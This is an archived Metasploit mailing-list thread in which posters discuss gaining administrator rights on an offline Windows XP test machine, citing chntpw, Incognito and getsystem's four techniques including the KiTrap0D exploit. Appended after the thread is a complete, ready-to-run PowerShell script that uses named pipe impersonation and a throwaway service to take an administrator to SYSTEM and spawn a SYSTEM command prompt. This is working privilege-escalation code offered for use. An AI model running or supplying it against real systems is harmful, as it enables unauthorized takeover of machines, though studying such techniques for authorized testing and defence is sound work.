Metasploit mailing list archives

Re: Privilege escalation on an isolated system


From: Brahim Sakka <brahim.sakka () gmail com>
Date: Sun, 27 Nov 2011 23:50:23 +0100

Thanks everyone for the suggestions and the answers.

As suggested by many, I have settled for wiping out the admin's
password using Linux. Not as stealthy as what MSF offers, but I guess
it's the easiest way for me to get admin access.


2011/11/26, James Butler <jamie.e.butler () gmail com>:
Please forgive me if I am misunderstanding your request, but if you have
physical access to the machine and want escalated privileges I would not
use metasploit.  Why not boot via a bootable chntpw disk and have fun -
obviously only if you have permission to do so

On Nov 25, 2011 10:47 PM, "Kevin Shaw" <kevin.lee.shaw () gmail com> wrote:

I wouldn't bother with meterpreter, just find a local privilege escalation
exploit.  You have access to the system, you don't need much in the way of
sparkle.
On Nov 25, 2011 5:30 PM, "Lukas Kuzmiak" <lukash () backstep net> wrote:

Hey man,

I would simply try to break down the getsystem from meterpreter and
use its single parts to gain the system privileges.

external/source/meterpreter/source/extensions/priv/server/elevate:
elevate.c - handler for 4 privilege escalation exploits/techniques
there (other 4 .c files)

you might either play with those (they were ported for metasploit, so
it won't be enough to just compile and run, you'd have to get rid of
the meterpreter structures) or (perhaps an easier path) just use those
as an inspiration and look on the internet for local implementations
of those.

from elevate.c:
// firstly, try to use the in-memory named pipe impersonation technique (Requires Local Admin rights)
// secondly, try to use the in-memory KiTrap0D exploit (CVE-2010-0232) (Requires Local User rights and vulnerable system)
// thirdly, try to use the in-memory service token duplication technique (Requires Local Admin rights and SeDebugPrivilege)
// fourthly, try to use the touching disk named pipe impersonation technique (Requires Local Admin rights)

that's what getsystem basically does, so you can just follow the same
path manually and see where you can get.

hope i helped at least a little.

or just look for other local windows exploits on the internet :)

cheers,
lukash

On Fri, Nov 25, 2011 at 10:39 PM, Brahim Sakka <brahim.sakka () gmail com>
wrote:
Thanks haZ and Roberto.

Let me explain the situation again. The Windows system I'm facing is
not connected to a network (it has no NICs). I have unprivileged user
access into it. It is _not_ an access through a meterpreter shell,
it's just a classic user/password combo that I'm using (I have
physical access to the box).
My question is: is there a way to leverage MSF's privilege
exploitation capabilities in order to get admin privileges on this
box?


2011/11/25, Roberto Espreto <robertoespreto () gmail com>:
Hi!

Launch the Incognito module, list the available tokens and impersonate the
one you want.

Regards,


2011/11/25 Brahim Sakka <brahim.sakka () gmail com>

Hello list,

I have a Windows XP SP3 test system with a limited user account. I
want to escalate my privileges and "getsystem".
Typically, I would generate an evil file with MSF, get a meterpreter
shell then getsystem. However, in this particular case, the system
cannot be connected to any network (no NICs). Also, I can't install
MSF itself on it because I don't have the required privileges.

Is it somehow possible to leverage the framework's built-in privilege
escalation capabilities in order to get admin privileges?
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework




--
*Roberto S. Soares (espreto)*
robertoespreto () gmail com
espreto () hacktraining com br
www.hacktrainig.com.br
http://codesec.blogspot.com
Skype: hack_training
Twitter @espreto
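
Lukas's breakdown of what getsystem tries, with the first technique worked through as an added example; this is not code from the thread and not Metasploit's own source. It reimplements in-memory named pipe impersonation in PowerShell (what one would actually type on the Windows box; it needs .NET 3.5's System.IO.Pipes and an elevated prompt). As the elevate.c comment notes, this technique requires local Administrator rights, so it takes an administrator to SYSTEM; it does not solve the original poster's limited-user problem. The pipe and service names are random, hypothetical values, and the way the SYSTEM client is triggered (a throwaway service running cmd.exe) is this example's choice, not a claim about how Metasploit does it.

```powershell
# Added example (not from this thread or from Metasploit): getsystem's first
# technique, named pipe impersonation, step by step in PowerShell.
# Needs local Administrator rights (to register and start a service) and an
# elevated prompt. The pipe and service names below are random, hypothetical names.
$ErrorActionPreference = 'Stop'

Add-Type -Namespace Win32 -Name Native -MemberDefinition @'
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct STARTUPINFO {
    public int cb; public string lpReserved, lpDesktop, lpTitle;
    public int dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
    public short wShowWindow, cbReserved2;
    public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError;
}
[StructLayout(LayoutKind.Sequential)]
public struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public int dwProcessId, dwThreadId; }

[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool DuplicateTokenEx(IntPtr hToken, uint dwDesiredAccess,
    IntPtr lpTokenAttributes, int ImpersonationLevel, int TokenType, out IntPtr phNewToken);

[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern bool CreateProcessWithTokenW(IntPtr hToken, uint dwLogonFlags,
    string lpApplicationName, string lpCommandLine, uint dwCreationFlags, IntPtr lpEnvironment,
    string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
'@

$suffix   = [guid]::NewGuid().ToString('N').Substring(0, 8)
$pipeName = "pipe_$suffix"   # hypothetical pipe name
$svcName  = "svc_$suffix"    # hypothetical service name

# 1. Create the server end of the pipe before anything can try to connect to it.
$server = New-Object System.IO.Pipes.NamedPipeServerStream(
    $pipeName, [System.IO.Pipes.PipeDirection]::InOut, 1,
    [System.IO.Pipes.PipeTransmissionMode]::Byte, [System.IO.Pipes.PipeOptions]::None)

$script:systemToken = [IntPtr]::Zero
try {
    # 2. Register a throwaway service whose "binary" is cmd.exe writing one line into
    #    the pipe. Services run as LocalSystem by default, so the pipe client is SYSTEM.
    #    sc.exe requires the space after each "option=".
    & sc.exe create $svcName binPath= "cmd.exe /c echo x > \\.\pipe\$pipeName" type= own start= demand | Out-Null
    # 'sc start' blocks until the SCM gives up on cmd.exe (not a real service, so the
    #  start "fails" with error 1053), but cmd.exe has connected long before that.
    #  Run it asynchronously so this thread is free to service the pipe.
    $null = Start-Process -FilePath sc.exe -ArgumentList @('start', $svcName) -WindowStyle Hidden -PassThru

    # 3. Accept the connection and read at least one byte: ImpersonateNamedPipeClient
    #    (which RunAsClient wraps) refuses to impersonate a client nothing was read from.
    $server.WaitForConnection()
    $null = $server.ReadByte()

    $server.RunAsClient([System.IO.Pipes.PipeStreamImpersonationWorker]{
        # While this block runs, the thread holds the client's (SYSTEM's) impersonation token.
        $me = [System.Security.Principal.WindowsIdentity]::GetCurrent()
        Write-Host "Impersonating: $($me.Name)"
        # 4. Turn it into a primary token that can back a new process.
        #    TOKEN_ALL_ACCESS = 0xF01FF, SecurityImpersonation = 2, TokenPrimary = 1
        $dup = [IntPtr]::Zero
        if (-not [Win32.Native]::DuplicateTokenEx($me.Token, 0xF01FF, [IntPtr]::Zero, 2, 1, [ref]$dup)) {
            throw "DuplicateTokenEx failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
        }
        $script:systemToken = $dup
    })

    # 5. Back in our own context, spawn cmd.exe from the duplicated token.
    #    CreateProcessWithTokenW needs SeImpersonatePrivilege, which local Administrators have.
    $si = New-Object -TypeName 'Win32.Native+STARTUPINFO'
    $si.cb = [Runtime.InteropServices.Marshal]::SizeOf($si)
    $pi = New-Object -TypeName 'Win32.Native+PROCESS_INFORMATION'
    $ok = [Win32.Native]::CreateProcessWithTokenW($script:systemToken, 0, "$env:SystemRoot\System32\cmd.exe",
        $null, 0x10, [IntPtr]::Zero, $null, [ref]$si, [ref]$pi)   # 0x10 = CREATE_NEW_CONSOLE
    if (-not $ok) { throw "CreateProcessWithTokenW failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())" }
    Write-Host "cmd.exe started from the SYSTEM token, PID $($pi.dwProcessId); run whoami in it to confirm."
}
finally {
    # 6. Clean up: the service entry and the pipe would otherwise stay behind.
    $server.Dispose()
    & sc.exe delete $svcName | Out-Null
}
```

Two things a practitioner should expect when running this: the asynchronous sc.exe start will report error 1053 after the SCM's timeout, which is normal here because cmd.exe never registers as a service, and the impersonation only succeeds if the server has read data from the client first, which is why the ReadByte call precedes RunAsClient.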